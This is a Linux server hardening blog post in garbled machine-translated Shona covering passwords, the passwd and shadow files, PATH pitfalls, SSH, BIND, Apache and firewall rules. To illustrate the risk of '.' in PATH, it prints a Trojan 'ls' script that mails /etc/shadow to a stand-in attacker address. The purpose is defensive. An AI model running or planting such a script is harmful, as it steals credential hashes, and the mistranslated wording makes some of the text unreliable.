Chengetedzo Matipi eLinux Yako (Server) (Chikamu 1)

Ini handina kumboburitsa chero chinhu pa blog kwenguva yakareba uye ndinoda kugovana newe rimwe zano rakatorwa kubva mubhuku iro, (Pakati pevamwe). Ndakaiwana kuUniversity uye ini ndichangobva kuverenga uye kunyangwe ichokwadi ichinge yapera uye mashandiro anoratidzwa haatombo shande pakapihwa shanduko yesystem, iwo zvakare anonakidza maficha anogona kuratidzwa. 9788448140502

Ini ndoda kujekesa kuti aya matipi anotungamirwa kune Linux system iyo inoshandiswa sevhavha, pane yepakati kana pamwe yakakura chiyero chakapihwa icho padesktop mushandisi nhanho, kunyange zvichikwanisika kuiswa, zvaisazobatsira.

Ini zvakare ndinoyambira kuti iwo ari nyore anokurumidza matipi uye ini handiende mune zvakawanda zvakadzama, kunyange ini ndichironga kuita imwe yakanyanya kuwanda uye yakazara posvo pane imwe nhaurwa. Asi ndichazozviona gare gare. Ngatitangei.

Mazano epassword. 

Kunyangwe ichinzwika senge yekubata bata, kuve neyakafanira password password kunoita mutsauko pakati peyakaremerwa system kana kwete. Kurwiswa kwakadai se "brute force" kutora mukana wekuva ne password yakaipa kuti uwane system. Matipi akajairika ndeaya:

  • Sungai mabhii makuru nemadiki.
  • Shandisa mavara akasarudzika.
  • Numeri.
  • Anopfuura matanhatu manhamba (ndinovimba anopfuura masere).

Pamusoro peizvi, ngatitarisei mafaera maviri akakosha.  / etc / passwd Uye / etc / shadow.

Chinhu chakakosha kwazvo ndechekuti iyo faira / etc / passwd. Pamusoro pekutipa zita remushandisi, yake uid, dhairekodhi nzira, bash .. nezvimwe. mune dzimwe nguva inoratidzawo kiyi yakavharidzirwa yemushandisi.

 Ngatitarisei pahunhu hwayo hwakaumbwa.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

mushandisi: cryptkey: uid: gid: nzira :: nzira: bash

Dambudziko chairo apa, nderekuti iyi faira rine mvumo -rw-r-r- zvinoreva kuti yakaverenga mvumo nechero mushandisi wesystem. uye kuva nekiyi yakavharidzirwa hakuna kunyanya kuomesa iyo chaiyo.

Ndicho chikonzero faira riripo / etc / mumvuri. Iyi ndiyo faira inochengeterwa makiyi ese evashandisi, pakati pezvimwe zvinhu. Iyi faira ine mvumo inodiwa kuitira kuti hapana mushandisi anogona kuiverenga.

Kugadzirisa izvi ipapo, isu tinofanirwa kuenda kune iyo faira / etc / passwd uye nekuchinja kiyi yakavharidzirwa ku "x", izvi zvinongochengeta kiyi iri mufaira redu / etc / mumvuri.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Matambudziko nePATH uye .bashrc nevamwe.

Kana mushandisi aita kuraira pane yavo koni, iyo Shell inotarisa iwo murairo mune dhairekitori runyorwa ruri mune PATH nharaunda inoshanduka.

Kana iwe ukanyora "echo $ PATH" mune koni yacho inoburitsa chimwe chakadai.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Imwe yeaya maforodha ndipo panotariswa Shell murairo wakanyorwa kuti uite. Iye "." zvinoreva kuti dhairekitori rekutanga kutsvaga iiyo yakafanana dhairekitori kubva kunoitwa murairo.

Ngatitii kune mushandisi "Carlos" uye uyu mushandisi anoda "kuita zvakaipa." Uyu mushandisi aigona kusiya iyo faira inonzi "ls" mune yake huru folda, uye mune ino faira ita rairo seiyi

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Uye kana mushandisi wemidzi yezvinhu zvekuenda, achiedza kunyora maforodha mukati meiyo carlos dhairekitori (sekutanga kwayinoita ichitarisa rairo mune imwecheteyo folda, nekusaziva kwaizove kuri kutumira iyo faira nemapassword kune ino email uyezve iwo maforodha aizo nyorwa uye aisazozviziva kusvika nguva dzaenda.

Kuti tirege izvo isu tinofanirwa kubvisa iyo "." yeiyo PATH kusiyanisa.

Nenzira imwecheteyo, mafaera akadai se / .bashrc, /.bashrc_profile, ./.login anofanirwa kuongororwa uye otarisa kuti hakuna "." mune iyo PATH kusiyanisa, uyezve kubva kumafaira senge ino, unogona kuchinja kwainoenda kune yakatarwa murairo.

Matipi nemasevhisi:

SHH

  • Dzima vhezheni 1 yeiyo ssh protocol mune iyo sshd_config faira.
  • Usatendese mushandisi wemidzi kuti apinde mukati nessh.
  • Iwo mafaera uye maforodha ssh_host_key, ssh_host_dsa_key uye ssh_host_rsa_key inofanira kungoverengwa nemudzi wemudzidzi.

BINDA

  • Chinja iyo yekugamuchira meseji mune iyo inonzi.conf faira kuti irege kuratidza iyo vhezheni nhamba
  • Limit zone chinjana, uye chete gonesa icho kune zvikwata zvinochida.

Apache

  • Dzivirira sevhisi pakuratidza yako vhezheni mumeseji yekutambira. Rongedza iyo httpd.conf faira uye wedzera kana kugadzirisa mitsara:  

ServerSignature Off
ServerTokens Prod

  • Dzima otomatiki indexing
  • Gadzira apache kuti isashandise mafaira akaomarara senge .htacces, * .inc, * .jsp .. nezvimwewo
  • Bvisa mapeji emurume kana sampuro kubva kusevhisi
  • Mhanya apache munzvimbo yakadzika midzi

Network Kuchengetedzwa.

Izvo zvakakosha kuvhara zvese zvinogoneka kupinda kune yako system kubva kune yekunze network, heano mamwe akakosha matipi ekudzivirira vapambi kubva pakuongorora uye kuwana ruzivo kubva kunetiweki yako.

Bvisa ICMP traffic

Iyo firewall inofanirwa kugadzirirwa kuvharira ese ari kuuya uye anobuda ICMP traffic uye echo mhinduro. Nezvo iwe unodzivirira izvo, semuenzaniso, scanner iri kutsvaga mhenyu michina munzvimbo dzakasiyana dzeIP inokutsvagisa. 

Dzivisa TCP ping scan.

Imwe nzira yekutora yako system ndiyo TCP ping scan. Ngatitii pane server rako pane Apache server pane chiteshi 80. Iye anopinza anogona kutumira ACK chikumbiro kune chiteshi icho.Neizvi, kana iyo system ikapindura, komputa ichave iri mupenyu uye ichaongorora mamwe masosi.

Kune izvi, yako firewall inofanirwa kugara iine sarudzo "nyika kuziva" uye inofanirwa kurasa ese ACK mapakeji asingaenderane neiyo yakatosimbiswa TCP kubatana kana chikamu.

Mamwe matipi ekuwedzera:

  • Shandisa maIDS masisitimu kuti utarise zviteshi zvechiteshi kunetiweki yako.
  • Gadzira Firewall kuitira kuti irege kuvimba necomputer source port port.

Izvi zvinodaro nekuti zvimwe zviyero zvinoshandisa chiteshi che "nhema" senge 20 kana 53, nekuti masisitimu mazhinji anovimba nemachiteshi aya nekuti akafanana ne ftp kana DNS.

NOTA: Rangarira kuti mazhinji ematambudziko anoratidzwa mune ino posvo akatogadziriswa mune angangove ese magove aripo. Asi hazvimbokuvadza kuva neruzivo rwakakosha nezve izvi zvinonetsa kuti zvisaitike kwauri.

NOTA: Gare gare ndichaona imwe nhaurwa uye ini ndichagadzira chinyorwa chine ruzivo rwakanyanya uye rwazvino.

Inodenha munhu wese kuverenga.

Thanks.


Izvo zviri muchinyorwa zvinoomerera pamisimboti yedu ye tsika dzekunyora. Kuti utaure chikanganiso tinya pano.

Mhinduro, siya zvako

Siya yako yekutaura

Your kero e havazobvumirwi ichibudiswa.

*

*

  1. Inotarisira iyo data: Miguel Ángel Gatón
  2. Chinangwa cheiyo data: Kudzora SPAM, manejimendi manejimendi.
  3. Legitimation: Kubvuma kwako
  4. Kutaurirana kwedata
  5. Dhata yekuchengetedza: Dhatabhesi inobatwa neOccentus Networks (EU)
  6. Kodzero: Panguva ipi neipi iwe unogona kudzora, kupora uye kudzima ruzivo rwako

  1.   kombiyuta akadaro

    Ini ndainyanya kufarira chinyorwa uye ndiri kufarira chidzidzo ichi, ndinokukurudzira kuti urambe uchiisa zvirimo.